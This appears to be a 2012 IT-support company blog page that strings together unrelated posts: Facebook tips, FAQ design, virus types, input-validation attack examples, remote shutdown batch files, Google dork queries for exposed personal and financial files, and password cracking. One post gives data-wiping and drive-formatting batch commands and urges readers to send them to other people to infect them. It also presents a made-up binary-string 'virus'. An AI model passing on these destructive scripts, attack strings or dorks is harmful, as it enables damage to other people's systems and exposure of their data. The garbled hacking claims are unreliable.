Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.

Our Values

We develop relationships that make a positive difference in our customers' business.

Our Values

We exhibit a strong will to win in the marketplace and in every aspect of our business.

Thursday, January 12, 2012

Facebook Timeline: Quick Tips And Smart Examples

A lot has already been covered about Facebook Timeline. A lot of critics (as expected) have negatively criticized Facebook Timeline while others consider it as the biggest gamble (which seems to be working) by Mark Zuckerberg. I will try not to bore you by discussing the same stuff over and over. Facebook Timeline is here to stay and we can either sit on the sidelines and let Timeline take control of the social world or we can be a part of this new movement.
Though I am a firm believer in swimming against the tide, on this rare occasion I will suggest that you enable Timeline on your Facebook profiles. It is time that you became accustomed to the new social networking phenomenon.
It is easy. Really. Follow the steps below:
1) Hit this link.
2) Hit the green colored “Get Timeline” button on the bottom bar.
3) Now, hold on. Before your second click I will suggest you go through your Timeline and make whatever changes you want in your timeline.
4) Once you are happy with your Timeline then hit the green colored “Publish Now” button on the top horizontal bar.
Wasn’t that really easy? Have fun with the new Facebook profile and keep reading to make it more attractive.
The new Facebook Timeline looks a bit complex though it actually isn’t. Let me take you through some of the tips that will come in handy when you start using Facebook Timeline.
Click the “Star” button on the top right corner of any item in your Facebook Timeline to expand it horizontally. Once you do so the item stretches across both columns and is easily visible to the viewer. This feature can be used when you want to emphasize something in your Timeline.

You can remove the items that you don’t like from your timeline. Besides deleting the item you can perform various other tasks (like editing the date, adding the location, marking spam and a lot more) with that item as seen in the image below:

You can get rid of the useless adverts that show on the right sidebar of your Facebook Timeline. All that you have to do is hover your mouse pointer on that advert and click the “X” button that becomes visible. Facebook will hide the advert but might ask a quick question which will help them improve their advert service. Be generous and leave your answer.

Just like the older version of Facebook, the timeline has the option to let you see how your timeline will look like to the general public. Just look for the View As option on the top of your timeline and test it out.

Although you will hide most of the useless content from your timeline, there will be times when you want to see everything that is actually part of your activity on Facebook. Look for the “Activity Log” button below your Facebook header image and click on it. You will now see everything that you have been up to on Facebook. You can filter the content by many fields and analyze it as much as you want. Know your activity and improve your social media experience.

Once you are accustomed to Facebook Timeline then it is time for some sort of beautification. Facebook Timeline provides the option to have one large image displayed on the top of your profile which gives your profile a completely new look. No other social networking website gives you the sort of look that the Facebook Timeline has to offer. Let me take you through some of the unique Facebook Timeline Covers that you can use right away on your Facebook Timeline.










I told you how to swim with the tide and be a part of Facebook Timeline phenomenon. I introduced you to some of the tips that can come in handy when you are about to use Facebook Timeline. Lastly, I presented some of the cover images that you can use on your Facebook Timeline. Now, before I wrap up, I will show some of the unique Facebook Timeline ideas that have garnered a lot of attention lately. These people were some of the very first people who successfully experimented with Facebook Timeline profile. Let us begin:

Andrew seems to be obsessed with the old look of Facebook. The obsession pushed him to give the new Facebook Timeline the look of old school Facebook. Pretty innovative I would say.

Mat’s Facebook cover page surely attracts attention when you look at it for the first time.

His Facebook Timeline profile goes with his name. Complex to figure out though simple once you know what it is.

Though there isn’t much that is unique with this Timeline Profile it’s still worth a view.

This is one rare Facebook Timeline profile that makes use of holiday seasons at its best.

Ever saw the Facebook Timeline style 404 error? Here is one for you to enjoy. It was sure that some will come up with a 404 Error page on their Timeline headers but this is pretty much the most different approach towards the 404 error page.

Robert’s Facebook Timeline Cover can easily be tagged as the most confused cover of them all. He still does not know what is on his mind!

Can’t explain anything about this Timeline profile. This has been doing rounds on the Internet due to its approach and it pretty much attracts all.

Another unique approach to Facebook Timeline Cover image.

Didn’t I tell you that QR Code‘s have their own marketing power? Here is another way to use QR code and attract attention.

How To Create An Effective FAQ For Your Website

Frequently Asked Questions is a good section to have in your website. They give users a chance to figure out things by themselves instead of wasting resources (both yours and theirs) with a 1-to-1 conversation (chat, Skype, messenger and so on).

But FAQ’s are a different type of content. Just like search and sitemap, it has its own particularities and things that you can do to improve user experience. You have to keep in mind, for instance, that users don’t go to FAQ pages, you have to lead them there.

Here we’ll see a couple of thoughts about it, good practices, inspiration and tools.
So, let’s rock!

Ok, first thing you need to keep in mind: Users don’t read on the web. They scan the page trying to find main keywords about something that may be important to them (just like 90% of you are doing right now). So use good headlines and questions keywords, avoid clichés and keep them short.
If you can, outline main keywords, like searched terms, or main topics.

For a long time FAQs have been misused, instead of real and relevant content, companies put questions they “wished” users would ask (WAQ, Wished to be Asked Questions).

It’s very important to put users needs first, just cover topics that are really important to them. Otherwise it’ll be just another page trying to hide the solution from them. Which, by the way, won’t solve the problem at all, leading to future problems, like unnecessary support requests, or lost sales.
People don’t go looking for FAQs. It’s not a common workflow thinking “Hey, I need to know about their refund policy.. Let’s go to FAQ”. Sounds strange, huh?

So you have to interlink it wisely in places where users may need help. Like using them along with search pages. Or using them as a “wall” before chat with real attendants: Ask the user what kind of problem they have, then suggest a few FAQ searched items based on the users keywords.

FAQ are great to provide complete answers, but if you just want to tell users how features work, or which type of data they should put in a registration form just go with tooltips or something like that.
Oh, and don’t forget to make it easy and mobile friendly, or in other words, don’t use just a simple hovering element or title attribute. You may use a plugin or add it as a plain text right above your field or button.

I know I’m saying that it’s important, but it has its place in websites. It’s a good idea for sales websites, services, apps… But if you have a simple blog or simple company website, just create an “about” page and you’ll be fine.

Have you ever thought about it? If you have a single page with good keyword density about your product and link it in several places inside your website, it can be a really good landing page.
So, think carefully about it, it may lead a lot of users to your website.

Again, Keep It Simple, Stupid, my friend. You don’t need to clarify every single question that may pop up about your product. You may categorize questions (if you have a huge amount of them) and show content just when users need it.

Just keep in mind that landing page idea: you have to talk about the main topics and solve users' problems fast; if not, they will just leave the website.

Like I said above, you may hide content by default and just show it when a user wants/requires it. You can use, for instance, a jQuery collapsible panels plugin and create dynamically collapsible panels. You can also use jQuery accordion plugins.

Another good thing to do, is add a “Table of contents” with smooth scrolling, so users can reach what they want easily and with a pretty cool effect.
You may use smooth scrolling scripts or something like LocalScroll so you’ll get a better organized and easier to use FAQ page.

Well, Matthew Corner wrote a tutorial with smooth scrolling, table of contents and good looking, and you can just download and edit it to better fit your needs.

Although many people use simple headings (h2,h3) for questions and paragraphs for answers, I think that it’s much more semantically correct using definition lists for them. So you may use definition title(s) and definition description(s) to wrap them up accordingly.
Another option, really good one actually, is to use the HTML5 element, which gives you those good looking collapsible panels by default (with browsers that support it, of course).

Paypal uses a really good system where users can see their FAQ or search by keywords, as well.

It’s pretty common to have users asking you really dumb questions. Don’t get me wrong, but sometimes they could easily find the answer themselves, if we gave them a chance.


Did you know that we have a tool for FAQ development? Pretty cool, huh? It’s called FAQme, and worth trying!

If you’re more of a social company, why not use a tool that integrates questions and people? Well, I’ve seen a couple of (young) companies using FormSpring as a simple way to answer real questions and let them be easily accessed by other clients.


Wednesday, January 11, 2012

Types of viruses :-

The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot-sector viruses are Michelangelo and Stoned.


2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.

This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.


4) Stealth Viruses :- These viruses are stealthy in nature, meaning they use various methods to hide themselves and avoid detection. They sometimes remove themselves from memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate, meaning that they change the viral code, known as the signature, each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes is unable to detect its presence.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless. A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

Run Firefox inside Firefox




How to run Firefox inside Firefox?

Yup, you can run Firefox inside Firefox just by typing the following URL.

How about opening Firefox inside Firefox, which is again in another Firefox?

Not bad, huh?

And it's really easy too: just type this URL into Firefox's address bar and there you go!

Firefox inside Firefox!

Copy and paste the following URL into a web browser (Mozilla Firefox).

chrome://browser/content/browser.xul

Following is the screenshot of this trick (Firefox in Firefox in Firefox, which is again in another Firefox)-

Input Validation Attacks :-

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.


The most common input validation attacks are as follows-


1) Buffer Overflow :- Buffer overflow attacks are enabled by sloppy programming or mismanagement of memory by the application developers. Buffer overflows may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It is also possible for an overflow to exist in a language’s (php, java, etc.) built-in functions.

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.

Here’s the buffer test, calling on Perl from the command line:

$ echo -e "GET /login.php?user=\
> `perl -e 'print "a" x 500'`\nHTTP/1.0\n\n" | \
nc -vv website 80

This sends a string of 500 “a” characters for the user value to the login.php file.

Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.


2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-


/menu.asp?dimlDisplayer=menu.asp


/webacc?User.asp=login.htt


/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem

/Getfile.asp?/scripts/Client/login.js


/includes/printable.asp?Link=customers/overview.htm



3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.

We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:

http://website/inc/errors.asp?Error=Invalid%20password

This displays a custom access denied page that says, “Invalid password”. Seeing a string on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:

http://website/inc/errors.asp?Error=
That is, place the script tags on the URL.

4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--
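
The four input classes above, seen from the server side: this is an added Python example (not code from the original post) that shows one defensive check per class, run against constructed inputs modelled on the post's own samples. The length limit, the extension allowlist, the `articles` table and all function names are assumptions made for the illustration.

```python
import html
import os
import sqlite3
import tempfile

MAX_PARAM_LEN = 64                        # assumed limit for short fields such as "user"
ALLOWED_TEMPLATE_EXT = {".tem", ".htm"}   # assumed allowlist of template types


def check_length(value, limit=MAX_PARAM_LEN):
    """Buffer overflow: reject oversized input before it reaches lower-level code."""
    if len(value) > limit:
        raise ValueError("parameter too long")
    return value


def resolve_template(base_dir, requested):
    """Canonicalization: resolve the path first, then verify it is still under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes template directory")
    if os.path.splitext(target)[1].lower() not in ALLOWED_TEMPLATE_EXT:
        raise ValueError("file type not allowed")
    return target


def render_error(message):
    """XSS: encode user-controlled text before placing it in the error page."""
    return '<p class="error">' + html.escape(message, quote=True) + "</p>"


def find_articles(conn, category):
    """SQL injection: bind the value as a parameter so it is never parsed as SQL."""
    cur = conn.execute("SELECT title FROM articles WHERE category = ?", (category,))
    return [row[0] for row in cur.fetchall()]


def demo():
    """Run each check on a constructed hostile input and collect the outcomes."""
    results = {}

    # 500 "a" characters in the user field, as in the buffer test above.
    try:
        check_length("a" * 500)
        results["long_user"] = "accepted"
    except ValueError:
        results["long_user"] = "rejected"

    # A legitimate template name and the ../ sequence quoted in the post.
    with tempfile.TemporaryDirectory() as base:
        open(os.path.join(base, "login.tem"), "w").close()
        results["template"] = os.path.basename(resolve_template(base, "login.tem"))
        try:
            resolve_template(base, "../../../../../../../../../boot.ini")
            results["traversal"] = "accepted"
        except ValueError:
            results["traversal"] = "rejected"

    # Script tags supplied in the Error parameter (constructed test string).
    results["error_html"] = render_error("<script>alert(1)</script>")

    # The "or 1=1" string from the post, against a constructed two-row table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (category TEXT, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [("sports", "Match report"), ("finance", "Budget")])
    results["normal_rows"] = find_articles(conn, "sports")
    results["sqli_rows"] = find_articles(conn, "sports' or 1=1--")
    conn.close()
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, "->", outcome)
```

With the bound parameter, the injected string is compared as a literal category name and matches no rows, while the normal value still returns its article.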

Shutdown Command Via Command Prompt :-

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.


To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.

In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.

You have to use at least one switch for the shutdown command to work.


The Switches :- The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option


-l: Log off (cannot be used with -m option)


-s: Shutdown the computer

-r: Shutdown and restart the computer

-a: Abort a system shutdown


-m \\computername: Remote computer to shutdown/restart/abort


-t xx: Set timeout for shutdown to xx seconds


-c "comment": Shutdown comment (maximum of 127 characters)

-f: Forces running applications to close without warning


-d [u][p]:xx:yy: The reason code for the shutdown. u is the user code, p is a planned shutdown code, xx is the major reason code (positive integer less than 256), and yy is the minor reason code (positive integer less than 65536).



Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.

If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-

shutdown -m \\computername -r -f


This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown -m \\computername -r -f -c "I'm restarting your computer. Please save your work now." -t 120

This command will restart the computer named computername, force any programs that might still be running to stop, show the user on that computer a message, and count down 120 seconds before it restarts.


shutdown -m \\computername -a


This command will abort a previous shutdown command that is in progress.

Using A Batch File :-


You can create a file that performs the shutdown command on many computers at one time. In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.


Make sure each shutdown command is on its own line.

An example of what should be typed in notepad is given below-

shutdown -m \\computer1 -s
shutdown -m \\computer2 -s
shutdown -m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.

Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.


You can use any combination of shutdown commands in a batch file.

Tuesday, January 10, 2012

Tips for Wireless Home Network Security


1) Change Default Administrator Passwords (and Usernames)


2) Turn on (Compatible) WPA / WEP Encryption


3) Change the Default SSID


4) Disable SSID Broadcast


5) Assign Static IP Addresses to Devices


6) Enable MAC Address Filtering


7) Turn Off the Network During Extended Periods of Non-Use


8) Position the Router or Access Point Safely

Monday, January 9, 2012

Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- If we type "hacker+yahoo+science" in the Google search box and click search, it will return results that are related to all three words simultaneously, i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".


Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.

intitle:"index of" returns all pages that have string "index of" in their title.

Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches where the URL of the page contains the word "admin".

Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that link to a given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" from sources all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents present on the domain www.microsoft.com, enter a query like the following.
"inurl:www.microsoft.com filetype:txt"


POPULAR SEARCH:
Google Search :- "Active Webcam Page" inurl:8080 Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.

Google Search :- "delete entries" inurl:admin/delete.asp Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.

Google Search :- "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.

Google Search :- intitle:"index of" finance.xls Description- Secret financial spreadsheets 'finance.xls' or 'finances.xls' of companies may be revealed by this query.

Google Search :- intitle:"index.of" robots.txt Description- The robots.txt file contains "rules" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!

Google Search :- intitle:index.of.admin Description- Locate "admin" directories that are accessible from directory listings.

Google Search :- inurl:"nph-proxy.cgi" "start browsing" Description- Returns lots of proxy servers that protect your identity online.

-: Folder Lock Without Any Software :-



Folder Lock With Password Without Any Software-


Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').

Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.

New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.

If you want to unlock your files, double click the batch file again and you will be prompted for the password.

Enter the password and enjoy access to the folder.


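@echo off
REM Hides a folder by renaming it and marking it hidden/system.
REM The password below is stored in plain text in this file, so anyone
REM who can read the .bat can read the password.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER

:CONFIRM
echo Are you sure you want to Lock the folder(Y/N)
REM Clear the variable first so an empty answer does not reuse an old value.
set "cho="
set /p "cho=>"
REM Quoted, case-insensitive comparisons so empty input does not break the script.
if /I "%cho%"=="Y" goto LOCK
if /I "%cho%"=="N" goto END
echo Invalid choice.
goto CONFIRM

:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto END

:UNLOCK
echo Enter password to Unlock folder
set "pass="
set /p "pass=>"
REM Replace the text between the quotes with your own password.
if NOT "%pass%"=="type your password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto END

:FAIL
echo Invalid password
goto END

:MDLOCKER
md Locker
echo Locker created successfully
goto END

:END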

Sunday, January 8, 2012

If you think that Notepad is useless ???

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.

says01001011000111110010010101010101010000011111100000


Step 2 :- Save As An EXE Any Name Will Do


Step 3 :- Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your drive d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

try to figure out urself rest

cant spoonfeed

its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this go to notepad and type the following:

@Echo off

Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as a .bat file

1) Firewalls are your guardian angels.

First of all, keep a software firewall active on your system and restrict access to ports that allow remote access into your system. A good idea is to allow only a few select hosts access to ports used by services such as ssh (port 22) or telnet (port 23). Keeping a firewall in place ensures that you alone dictate who gets to access remote services on your computer and who doesn’t. To set up a firewall in Linux, you can use the iptables program, which comes standard with most Linux distributions. However, iptables is quite difficult and complicated to set up correctly, and you will need to spend some time fiddling with the command line, but it is very flexible and powerful once configured correctly.

If messing about with iptables doesn’t appeal to you, there are frontends to iptables that you can use to set up effective firewalls. One such frontend is ufw (uncomplicated firewall). This program comes standard on Ubuntu and is quite simple to set up. To use it, you first have to enable it by typing 'sudo ufw enable' in the terminal. Once the ufw service is active, adding rules is as simple as 'sudo ufw allow 22/tcp'. This statement allows all TCP traffic on port 22; swap allow for deny and you have the ssh service blocked. It's that simple, much easier than mucking about with iptables.

Of course, there are many people who do not like the idea of using command-line programs and like all their apps to be graphical. If you prefer a GUI configured firewall, then firestarter is the choice for you. Firestarter is a breeze to use, and has good documentation available on the firestarter website.


2) Passwords are for your protection, choose them well

Choose good user passwords, especially for root. One way to choose a secure password is to take a sentence, reduce it to an acronym and then replace some letters of the acronym with symbols and add some numbers to it. This mixing of letters, numbers and symbols, along with its long length, will make a strong password.

Never use actual words that have meaning as passwords. These types of passwords are weak and can be cracked using dictionary attacks. Also along those lines: never use words that hold personal significance for you, i.e. don’t use passwords that people who know you will be inclined to think that you would use, like a favorite pet’s name.

And for god’s sake, don’t use the word ‘password’ as a password…. ( don’t laugh… thats one of the most common passwords .. )


3) Use antivirus

Yeaps, you read right: antivirus. Antivirus on Linux, you say? Yes, Linux has antivirus suites as well, but this is more for cleaning off your thumbdrives that you may have used in an infected Windows machine than for killing Linux viruses, as the system of user permissions for executing files makes Linux a very inhospitable place for computer viruses to live. ClamAV is a good antivirus choice, with a GUI version available for most major distros.


4) Be careful what scripts you get off the net
Getting bash scripts off the net is convenient, but be careful what scripts you run on your system, and make sure you check them out first. If you suspect that a script you got has some nasty intentions behind it, but you do not have the expertise in bash scripting to be sure, post the script in text form on Linux support forums and the community will help you out. Unfortunately, there are idiots out there who write destructive shell scripts and release them into the wilds of the internet; in this case intuition is your best defence.

5) Encrypt sensitive data that you may have.
The concept behind encryption is relatively simple: make the data unreadable to anybody besides authorised users.

My favourite program for encrypting data on linux AND windows would have to be truecrypt. Truecrypt works by creating a virtual volume which you can then set a passphrase or security key to. When you mount the virtual volume, you can then add files to it, which will be totally encrypted and unviewable once unmounted. The only way to mount the drive is to supply the passphrase or key.

6) Keep your BIOS set to boot from your hard drive and then add a password to your BIOS.

This is to keep people from booting off live CDs and cracking your password from them. Although it is relatively easy to reset the BIOS password, this should be at least a minor deterrent to those who may try this cracking method.

Well, there you go. Hopefully you will use these tips and make your system a safer box to work on.

Password Hacking :-


Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Most passwords can be cracked using the following techniques:


1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.

If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.

One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.

LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
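The split described above can be put into numbers. The following is an added example, not code from the original post: it reproduces only the preprocessing step (the upper-casing and null padding are details of LM that the post does not state; ASCII-only input is an assumption) and compares the worst-case search of the two halves with that of an unsplit 14-character password.

```python
PRINTABLE = 95            # printable ASCII characters
LM_ALPHABET = 95 - 26     # upper-casing removes the 26 lower-case letters

def lm_halves(password):
    """Return the two 7-byte fields that LM processes independently."""
    if len(password) > 14:
        raise ValueError("LM only covers passwords shorter than 15 characters")
    # Case is folded and the password is null-padded to 14 bytes before the split.
    data = password.upper().encode("ascii").ljust(14, b"\0")
    return data[:7], data[7:]

def exhaustive_guesses(alphabet, length):
    """Number of candidates of every length from 1 to `length`."""
    return sum(alphabet ** n for n in range(1, length + 1))

def compare():
    """Worst-case guesses: one 14-character secret vs two 7-character halves."""
    whole = exhaustive_guesses(PRINTABLE, 14)
    # The halves are independent, so their costs add instead of multiplying.
    split = 2 * exhaustive_guesses(LM_ALPHABET, 7)
    return {"whole": whole, "split": split, "factor": whole // split}

if __name__ == "__main__":
    print(lm_halves("CorrectHorse9!"))   # constructed sample password
    print(compare())
```

The factor returned by `compare()` is how much work the split removes for a full-length password, which is why a storage format that preserves the whole password in a single hash matters more than the user's choice of characters.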

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....
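The list above translates directly into a check that can run when a user sets a password. This is an added example, not code from the original post; the word list is a small constructed sample, and the function name and the `personal` parameter (names, birthplace, dates, licence plate and so on) are assumptions made for illustration.

```python
import re

# Constructed sample; a real check would load a full dictionary file.
DICTIONARY = {"dragon", "monkey", "sunshine", "football", "letmein"}
STOCK = ("password", "passcode", "admin")
KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890")

def _match(candidate, personal):
    """Return which categories from the list one candidate string falls into."""
    found = set()
    if any(word in candidate for word in STOCK):
        found.add("stock word")            # "password", "admin" and derivatives
    if candidate in personal:
        found.add("personal information")
    if candidate in DICTIONARY:
        found.add("dictionary word")
    if len(candidate) >= 4 and any(candidate in row for row in KEYBOARD_ROWS):
        found.add("keyboard row")
    return found

def weak_reasons(password, username="", personal=()):
    """Return the set of reasons a password is guessable (empty set = none found)."""
    if not password:
        return {"blank"}
    known = {username.lower(), *(p.lower() for p in personal)} - {""}
    low = password.lower()
    core = re.sub(r"[\W\d_]+$", "", low)   # drop suffixed digits and symbols
    direct = _match(low, known)
    variants = set()
    for candidate in (core, low[::-1], core[::-1]):
        if candidate and candidate != low:
            variants |= _match(candidate, known)
    reasons = direct | variants
    if variants - direct:                  # only caught after undoing a tweak
        reasons.add("simple modification")
    return reasons

if __name__ == "__main__":
    for pw in ("", "Password1", "nogard", "qwerty", "Tq7#mV2$xLp9"):
        print(repr(pw), sorted(weak_reasons(pw)))
```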

In one survey of Facebook and MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing uppercase and lowercase characters, numbers and special characters is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during the development stages of the software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter a default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques fail, attackers use the brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of the keys available on the keyboard. As soon as the correct password is reached, it is displayed on the screen. This technique takes an extremely long time to complete, but the password will surely be cracked.

The longer the password, the longer it takes to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique, which is generally used to crack the passwords of e-mail accounts and all those accounts where secret or sensitive personal information is stored by the user, such as social networking websites, matrimonial websites, etc.

Phishing is a technique in which the attacker creates a fake login screen and sends it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as the victim clicks on the "enter" or "login" button, this information reaches the attacker using scripts or online form processors, while the user (victim) is redirected to the home page of the e-mail service provider.

Never reply to messages that demand your username and password while claiming to be from your e-mail service provider.

